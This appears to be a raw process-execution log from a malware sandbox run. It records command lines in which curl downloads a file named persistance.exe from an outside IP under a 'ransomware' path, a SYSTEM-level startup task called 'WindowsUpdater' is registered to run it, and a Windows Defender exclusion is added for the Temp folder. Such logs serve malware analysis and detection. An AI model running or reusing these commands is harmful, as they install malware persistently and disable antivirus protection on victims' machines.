schtasks.exe schtasks /QUERY /TN "WindowsUpdater"
2728cmd.exe C:\Windows\system32\cmd.exe /c curl -s 130.61.181.50/ransomware/persistance.exe > C:\Users\test22\AppData\Local\Temp\Update.exe
2776curl.exe curl -s 130.61.181.50/ransomware/persistance.exe
2820cmd.exe C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONSTART /RL HIGHEST /F /RU SYSTEM /TN "WindowsUpdater" /TR "C:\Users\test22\AppData\Local\Temp\Update.exe" 1>NUL 2>NUL
2896schtasks.exe SCHTASKS /CREATE /SC ONSTART /RL HIGHEST /F /RU SYSTEM /TN "WindowsUpdater" /TR "C:\Users\test22\AppData\Local\Temp\Update.exe"
2940cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp"
2992powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp"
3036cmd.exe C:\Windows\system32\cmd.exe /c cls
2196